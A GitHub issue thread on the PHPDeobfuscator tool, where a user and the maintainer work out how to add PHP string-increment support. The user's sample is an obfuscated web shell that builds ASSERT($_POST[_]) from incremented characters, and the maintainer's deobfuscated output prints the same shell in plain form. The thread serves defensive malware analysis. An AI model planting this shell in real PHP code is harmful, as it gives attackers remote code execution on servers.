### ISSUE TITLE
Unable to handle increment of string

### ISSUE THREAD

**Issue by e1ysiaaa** [simon816/PHPDeobfuscator#10]
hello,when I was working with a confused php sample, I found that it couldn't handle string increments like this:
```
<?php
    $a = "a";
    $a++;  //$a is 'b'
```
In the sample, starting from character a,  ‘assert’ are obtained through self-increment operation, and command execution statements are constructed.
```
<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
```
For string variables, statements in $a++ format cannot be converted to $a+ = 1 or $a = $a+ 1.
How do you do variable storage? How do I get the value of the specified variable?Is it `$node->getAttribute(AttrName::VALUE)`?
My idea is to get the value of the variable and update the new value after increment.
Look forward to your thoughts.

**Comment by simon816** [comment]
Thanks for letting me know about this. I was not aware you could increment strings like that.


> How do you do variable storage? How do I get the value of the specified variable?Is it $node->getAttribute(AttrName::VALUE)?

Yes, there is a utility function `Utils::getValue` to convert a node to its value: https://github.com/simon816/PHPDeobfuscator/blob/35e9fbcff1be30b0fe9ac3f68f6868385b049ee1/src/Utils.php#L59

It looks like I may have missed the increment operators from the reducers, just needs to be added to `UnaryReducer` https://github.com/simon816/PHPDeobfuscator/blob/35e9fbcff1be30b0fe9ac3f68f6868385b049ee1/src/Reducer/UnaryReducer.php

**Comment by simon816** [comment]
A complication with post increment/decrement operators is that they need to be split into two expressions, which is not possible to do in general.

For example:
```php
$a = "a";
foo($a++);
```

I want to use something like the comma operator from JavaScript, i.e:
```php
$a = "a";
foo( ($a = "b", "a") );
```
But this is not legal in PHP, so the assignment must go somewhere else, which could lead to a semantically different program.

**Comment by e1ysiaaa** [comment]
Thank you for your reply.
My idea is to get the ASCII value of the last character of the string and convert it through `chr()` and `ord()`.
For example
```
public function reduceStringInc(Node\Expr\PostInc $node)
    {
        //Gets the value of the string
        $val = Utils::getValue($node->var);
        //If the string length is greater than 1, increment the last character by ascii+1 and concatenate the original string.
        if(strlen($val) > 1){
            $status = True;
            $forwardstr = substr($val,0,strlen($val)-1);
            $backwardstr = substr($val,-1);
        }else{
            $status = False;
            $backwardstr = $val;
        }
        $new_str = chr(ord($backwardstr) + 1);
        if($status){
            $new_string = $forwardstr . $new_str;
        }else{
            $new_string = $new_str;
        }
        return Utils::scalarToNode((string) $new_string);
    }
```
The result of this code is as follows
```
<?php
    $a = "qazwsx";
    $a++;
    echo $a;
------------------------
$a = "qazwsx";
"qazwsy";
echo "qazwsx";
```
`$a++` is reduced to `qazwsy`.
But notice that the result of `echo $a` is still `qazwsx`
If there are more than one `$a++` operation, the result will be the same.
 after each restore of $a++, we need to update the new value to the node of $a.
I tried to use
`$node->var->setAttribute(AttrName::VALUE,$new_string);`
But it doesn't seem to work 😂.
Is my thinking and method right？

**Comment by simon816** [comment]
You've over-complicated the incrementation. You can simply do `$val++` and let PHP handle the incrementation :slightly_smiling_face: 

Something as simple as this:
```php
    public function reducePostInc(Node\Expr\PostInc $node)
    {
        $val = Utils::getValue($node->var);
        $val++;
        return new Node\Expr\Assign($node->var, Utils::scalarToNode($val));
    }
```
However I see this still doesn't actually work, I think we need the new `Expr\Assign` node to be handled in the [`Resolver`](https://github.com/simon816/PHPDeobfuscator/blob/35e9fbcff1be30b0fe9ac3f68f6868385b049ee1/src/Resolver.php) class.

**Comment by simon816** [comment]
increment is now implemented, this is what it returns for your sample:

```php
<?php

$_ = [];
$_ = @"Array";
// $_='Array';
$_ = $_[false];
// $_=$_[0];
$___ = $_;
// A
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
$__ = "P";
$__ = "Q";
$__ = "R";
$__ = "S";
$___ = "AS";
// S
$___ = "ASS";
// S
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
// E
$___ = "ASSE";
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
$__ = "P";
$__ = "Q";
$__ = "R";
// R
$___ = "ASSER";
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
$__ = "P";
$__ = "Q";
$__ = "R";
$__ = "S";
$__ = "T";
// T
$___ = "ASSERT";
$____ = '_';
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
$__ = "P";
// P
$____ = "_P";
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
// O
$____ = "_PO";
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
$__ = "P";
$__ = "Q";
$__ = "R";
$__ = "S";
// S
$____ = "_POS";
$__ = $_;
$__ = "B";
$__ = "C";
$__ = "D";
$__ = "E";
$__ = "F";
$__ = "G";
$__ = "H";
$__ = "I";
$__ = "J";
$__ = "K";
$__ = "L";
$__ = "M";
$__ = "N";
$__ = "O";
$__ = "P";
$__ = "Q";
$__ = "R";
$__ = "S";
$__ = "T";
// T
$____ = "_POST";
$_ = $_POST;
ASSERT($_[_]);
// ASSERT($_POST[_]);
```
